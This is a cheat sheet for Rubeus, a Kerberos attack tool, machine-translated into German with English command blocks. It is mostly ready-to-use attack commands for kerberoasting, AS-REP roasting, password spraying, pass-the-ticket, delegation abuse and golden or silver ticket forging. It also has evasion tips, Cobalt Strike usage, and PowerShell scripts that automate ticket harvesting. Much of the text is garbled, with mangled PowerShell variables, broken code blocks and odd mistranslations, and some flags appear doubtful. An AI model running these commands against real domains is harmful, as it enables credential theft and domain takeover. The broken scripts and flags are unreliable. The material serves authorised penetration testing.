Rubeus Kerberos Interaction Tool Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Rubeus ist ein C#-Toolset für raue Kerberos Interaktion und Missbrauch. Es ist für den Angriff von Kerberos Implementierungen konzipiert und beinhaltet Funktionalität für Ticketanfragen, Erneuerungen und verschiedene Kerberos-basierte Angriffe. Rubeus ist besonders nützlich für Active Directory Penetrationstests und rote Teamoperationen.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und Sicherheitsbewertungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Vorkompilierte Binary

# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"

# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256
```_

### Compile from Source
```powershell
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/
```_

### Alternative Downloads Methoden
```powershell
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output

# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe
```_

## Basisnutzung

### Befehlsstruktur
```cmd
# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help
```_

### Verfügbare Befehle
|Command|Description|
|---------|-------------|
|`asktgt`|Request a TGT (Ticket Granting Ticket)|
|`asktgs`|Request a TGS (Ticket Granting Service)|
|`askticket`|Request a ticket for a specific service|
|`renew`|Renew a ticket|
|`s4u`|Perform S4U (Service for User) attacks|
|`ptt`|Pass-the-ticket attacks|
|`purge`|Purge tickets from memory|
|`describe`|Describe ticket contents|
|`klist`|List current tickets|
|`dump`|Dump tickets from memory|
|`triage`|Triage tickets|
|`monitor`|Monitor for new tickets|
|`harvest`|Harvest tickets|
|`brute`|Brute force passwords|
|`kerberoast`|Kerberoasting attacks|
|`asreproast`|AS-REP roasting attacks|

## Ticketanfragen und Management

### Anfrage TGT (Ticket Zuteilungskarte)
```cmd
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com
```_

### Anfrage TGS (Ticket Granting Service)
```cmd
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com

# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256
```_

### Kartenverwaltung
```cmd
# List current tickets
Rubeus.exe klist

# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets
Rubeus.exe purge

# Purge specific ticket
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory
Rubeus.exe dump

# Dump tickets for specific user
Rubeus.exe dump /user:username
```_

## Kerberoasting Angriffe

### Basic Kerberoasing
```cmd
# Kerberoast all SPNs
Rubeus.exe kerberoast

# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount

# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4

# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
```_

### Fortgeschrittene Kerberoasting
```cmd
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"

# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com

# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com

# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise
```_

### Gezielte Kerberoasting
```cmd
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com

# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020

# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"
```_

## AS-REP Roasting Angriffe

### AS-REP Roasing
```cmd
# AS-REP roast all users
Rubeus.exe asreproast

# AS-REP roast specific user
Rubeus.exe asreproast /user:username

# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat
```_

### Advanced AS-REP Roasing
```cmd
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com

# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com
```_

## Pass-the-Ticket (PTT) Angriffe

### Basic Pass-the-Ticket
```cmd
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe
```_

### Erweiterte PTT Techniken
```cmd
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi

# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com

# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe
```_

## S4U (Service für Benutzer) Angriffe

### S4U2Self Angriffe
```cmd
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com
```_

### S4U2Proxy Angriffe
```cmd
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap

# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http
```_

### Beschränkte Delegationsmissbrauch
```cmd
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com

# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com
```_

## Gold- und Silberkartenangriffe

### Goldene Ticket-Erstellung
```cmd
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520
```_

### Silver Ticket Creation
```cmd
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com
```_

## Ticketbeschaffung und -überwachung

### Ticket-Ernährung
```cmd
# Harvest tickets from all sessions
Rubeus.exe harvest

# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30

# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator

# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt
```_

### Überwachung der Fahrkarten
```cmd
# Monitor for new tickets
Rubeus.exe monitor

# Monitor with specific interval
Rubeus.exe monitor /interval:60

# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount

# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt
```_

### Fahrkartentest
```cmd
# Triage all tickets
Rubeus.exe triage

# Triage tickets for specific user
Rubeus.exe triage /user:administrator

# Triage with LUID filter
Rubeus.exe triage /luid:0x12345

# Triage and show service tickets only
Rubeus.exe triage /service
```_

## Passwort-Angriffe

### Passwort-Spray
```cmd
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket

# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket

# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket
```_

### Einsichtliche Validierung
```cmd
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials

# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials

# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials
```_

## Erweiterte Techniken

### Cross-Domain Angriffe
```cmd
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com

# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket

# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519
```_

### Unzuständige Delegationsmissbrauch
```cmd
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5

# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap

# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt
```_

### Resource-Based Constrained Delegation
```cmd
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt
```_

## Evasion Techniken

### OPSK Erwägungen
```cmd
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256

# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000

# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com

# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com
```_

### Stealth Operationen
```cmd
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0

# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024
```_

## Integration mit anderen Tools

### Mimikatz Integration
```cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi

# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi
```_

### Impacket Integration
```bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com
```_

### Cobalt Strike Integration

Cobalt Strike beacon commands

beacon> execute-assembly Rubeus.exe kerberoast beacon> execute-assembly Rubeus.exe asreproast beacon> execute-assembly Rubeus.exe dump ```_

Automatisierungsskripte

Umfassende Kerberos Bewertung

```powershell

Comprehensive Kerberos assessment script

param( [string]$Domain = \(env:USERDOMAIN, [string]\)OutputPath = "C:\Temp\KerberosAssessment" )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

Kerberoasting

Write-Host "[+] Performing Kerberoasting..." & Rubeus.exe kerberoast /outfile:"\(OutputPath\kerberoast.txt" /domain:\)Domain

AS-REP Roasting

Write-Host "[+] Performing AS-REP Roasting..." & Rubeus.exe asreproast /outfile:"\(OutputPath\asreproast.txt" /domain:\)Domain

Ticket triage

Write-Host "[+] Triaging current tickets..." & Rubeus.exe triage|Out-File "$OutputPath\ticket_triage.txt"

Dump tickets

Write-Host "[+] Dumping tickets..." & Rubeus.exe dump|Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath" ```_

Automatisierte Ticketbeschaffung

```powershell

Automated ticket harvesting script

param( [int]\(Interval = 300, # 5 minutes [string]\)OutputPath = "C:\Temp\TicketHarvest", [int]$Duration = 3600 # 1 hour )

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

\(endTime = (Get-Date).AddSeconds(\)Duration) $iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt \(endTime) \\\\{ (timestamp = Get-Date -Format "yyyyMMdd_HHmmss" \(outputFile = "\)OutputPath\harvest_\)iteration`_\)timestamp.txt"

Write-Host "[+] Iteration $iteration - Harvesting tickets..."
& Rubeus.exe harvest|Out-File $outputFile

Write-Host "[+] Tickets saved to $outputFile"

if ((Get-Date) -lt $endTime) \\{
    Write-Host "[+] Waiting $Interval seconds..."
    Start-Sleep -Seconds $Interval
\\}

$iteration++

\}

Write-Host "[+] Ticket harvesting complete" ```_

Domain Reconnaissance Script

```powershell

Domain reconnaissance with Rubeus

param( [string]\(Domain, [string]\)Username, [string]\(Password, [string]\)OutputPath = "C:\Temp\DomainRecon" )

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

Test credentials

Write-Host "[+] Testing credentials..." \(credTest = & Rubeus.exe asktgt /user:\)Username /password:\(Password /domain:\)Domain /getcredentials \(credTest|Out-File "\)OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") \{ Write-Host "[+] Credentials valid, continuing reconnaissance..."

# Kerberoasting with credentials
Write-Host "[+] Kerberoasting with credentials..."
& Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"

# AS-REP Roasting with credentials
Write-Host "[+] AS-REP Roasting with credentials..."
& Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"

Write-Host "[+] Reconnaissance complete"

\} else \{ Write-Host "[-] Credentials invalid, stopping reconnaissance" \} ```_

Fehlerbehebung

Gemeinsame Themen

```cmd

Clock skew issues

w32tm /resync

Network connectivity

nslookup domain.com telnet dc01.domain.com 88

Kerberos configuration

klist purge klist

DNS resolution

nslookup kerberos._tcp.domain.com ```

Debug Mode

```cmd

Enable Kerberos logging

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1

View Kerberos events

Get-WinEvent -LogName System|Where-Object \{$.Id -eq 4768 -or $.Id -eq 4769\}

Check ticket cache

klist tickets ```_

Fehlerauflösung

```cmd

KDC_ERR_PREAUTH_FAILED

Check username/password, account lockout

KDC_ERR_C_PRINCIPAL_UNKNOWN

Verify username format and domain

KDC_ERR_S_PRINCIPAL_UNKNOWN

Check SPN existence and format

KRB_AP_ERR_SKEW

Synchronize time with domain controller

```_

Best Practices

Operationelle Sicherheit

1. **Benutze legitime Konten*: Verdächtige Servicekonten vermeiden, wenn möglich
2. **Limit-Anfragen*: Überfluten Sie den Domänencontroller nicht mit Anfragen
3. ** Zeitsynchronisation**: Stellen Sie sicher, dass die richtige Zeit synchronisiert wird, um Uhr skew zu vermeiden
4. Clean up: Injizierte Tickets nach Operationen entfernen
5. **Monitor logs*: Bewusstsein für generierte Sicherheitsereignisse

Angriffsstrategie

```cmd

Start with reconnaissance

Rubeus.exe triage Rubeus.exe klist

Identify targets

Rubeus.exe kerberoast /stats Rubeus.exe asreproast /stats

Execute targeted attacks

Rubeus.exe kerberoast /user:specific_target Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin

Maintain persistence

Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com ```_

Ressourcen

• [Rubeus GitHub Repository](LINK_5_
• Kerberos Protokolldokumentation
• [Active Directory Security](LINK_5
• Harmj0y's Blog
• [SpecterOps Blog](LINK_5_

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Rubeus. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von Active Directory Sicherheitsbewertungen haben. *